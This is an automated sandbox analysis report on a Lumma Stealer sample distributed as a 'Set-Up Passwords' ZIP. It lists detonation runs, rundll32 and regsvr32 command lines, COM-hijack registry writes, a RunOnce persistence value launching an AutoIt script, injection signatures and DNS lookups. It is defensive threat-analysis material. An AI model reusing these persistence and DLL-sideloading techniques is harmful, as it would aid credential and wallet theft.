Malware Analysis Report

2024-12-07 13:01

Sample ID 241113-sn97yatmhy
Target #Set-Uρ__3344--P𝐚SS̤̊w0rD̼S!!#.zip
SHA256 ffad20c53b74e58c7f4e3ade42368adae98e71336df074b17fc31874883a6405
Tags
discovery persistence privilege_escalation lumma spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ffad20c53b74e58c7f4e3ade42368adae98e71336df074b17fc31874883a6405

Threat Level: Known bad

The file #Set-Uρ__3344--P𝐚SS̤̊w0rD̼S!!#.zip was found to be: Known bad.

Malicious Activity Summary

discovery persistence privilege_escalation lumma spyware stealer

Lumma Stealer, LummaC

Lumma family

Downloads MZ/PE file

Blocklisted process makes network request

Loads dropped DLL

Uses the VBS compiler for execution

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Event Triggered Execution: Component Object Model Hijacking

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Program crash

Browser Information Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 15:17

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

138s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2416 wrote to memory of 4464 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 4464 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 4464 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4464 -ip 4464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4464 -ip 4464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 848

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

118s

Max time network

120s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 2176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4804 wrote to memory of 1712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4804 wrote to memory of 1712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4804 wrote to memory of 1712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libdirectsound_plugin.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 232.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

137s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 392 wrote to memory of 3712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 392 wrote to memory of 3712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 392 wrote to memory of 3712 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20241023-en

Max time kernel

119s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1596 wrote to memory of 2968 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d11_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20241010-en

Max time kernel

118s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2300 wrote to memory of 2308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\updater\nvdisps.dll

Signatures

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustDesktopSizePos\ = "AdjustDesktopSizePos Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{63005CD0-8541-439c-A66A-617F4B1F2BCB}\ProgID\ = "DisplayServer.TVWizard.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A158544D-66FA-4F19-8806-F3CA2E2A4C52}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\AppID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio\ = "SetupDigitalAudio Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv\CurVer\ = "DisplayServer.ColorSettingsAdv.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView.1\CLSID\ = "{7945F814-7BFB-4506-A113-2BD66CDC713A}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{63005CD0-8541-439c-A66A-617F4B1F2BCB} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\ = "CategoryMultiMon Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoAudioControl\CurVer\ = "DisplayServer.VideoAudioControl.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus\CurVer\ = "DisplayServer.VideoHDCPStatus.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}\1.0\HELPDIR C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.RotateDisplay\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{73BCA54E-6AEB-4597-8F27-E1284FF12722}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio.1\ = "SetupDigitalAudio Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3B877C7-83CA-4c9b-87FB-BE0D518C2441}\AppID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B53EBC0C-2251-4AE2-9818-FD6AAF843EC2}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\ = "VideoAudioControl Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6E4B938E-4BA1-4E8D-BCBA-8C51CE95F94F}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ServerMain\CLSID\ = "{73BCA54E-6AEB-4597-8F27-E1284FF12722}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3B877C7-83CA-4c9b-87FB-BE0D518C2441}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustSizePosExt.1 C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{26A37DC6-935D-439B-80DD-C1006AE13D71}\ProgID\ = "DisplayServer.Config.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6A22E68F-887C-4221-9DF1-EE0B3AC76497} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\ProgID\ = "DisplayServer.VideoHDCPStatus.1" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}\1.0\ = "DisplayServer 1.0 Type Library" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6539579C-2657-45E5-985F-835E197959C2}\ProgID\ = "DisplayServer.AdjustSizePosExt.1" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv\CLSID\ = "{B53EBC0C-2251-4AE2-9818-FD6AAF843EC2}" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0FB41BD0-3107-40A5-8D49-456E585947B2}\ = "IdentifyDisp Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BC39379-8D90-4F18-8817-795C57163770}\ = "ScreenMove Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoAudioControl.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{AAB8F985-EADA-428B-8636-270F58E1F1EF}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{01367108-5EE2-4E1C-A8DE-24438065ABC9}\TypeLib\ = "{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\ProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{91363F1E-E7CA-4959-85D6-963719EC79FC}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CustomRez.1\ = "CustomRez Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{49F585C0-CE12-4306-9100-B6A28857B10B}\AppID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{7945F814-7BFB-4506-A113-2BD66CDC713A}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.RotateDisplay\CLSID\ = "{6017A978-93AD-4F2F-9E2D-07CF8C8DEBC4}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BC39379-8D90-4F18-8817-795C57163770}\VersionIndependentProgID C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BC39379-8D90-4F18-8817-795C57163770}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\VersionIndependentProgID\ = "DisplayServer.CategoryMultiMon" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CC0648AE-7E85-483C-B1DB-9335C9D6F8C7} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\ = "VideoHDCPStatus Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\VersionIndependentProgID\ = "DisplayServer.ScreenTimingDVI" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.AdjustDesktopSizePos\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiMon C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.SetupDigitalAudio\CurVer C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryAppearance.1\ = "CategoryAppearance Class" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CC0648AE-7E85-483C-B1DB-9335C9D6F8C7}\ = "ColorCorrection Class" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiView\CurVer C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80BA3813-908F-4D4C-A5FF-263640AD5B7A}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.ColorSettingsAdv.1 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B53EBC0C-2251-4AE2-9818-FD6AAF843EC2}\TypeLib\ = "{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}" C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\updater\nvdisps.dll

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

115s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"

Signatures

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif N/A

Uses the VBS compiler for execution

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" C:\Users\Admin\AppData\Roaming\RDJUYV.pif N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1852 set thread context of 4192 N/A C:\Users\Admin\AppData\Local\Temp\Set-up.exe C:\Windows\SysWOW64\more.com
PID 4144 set thread context of 4012 N/A C:\Users\Admin\AppData\Roaming\RDJUYV.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\RDJUYV.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Set-up.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
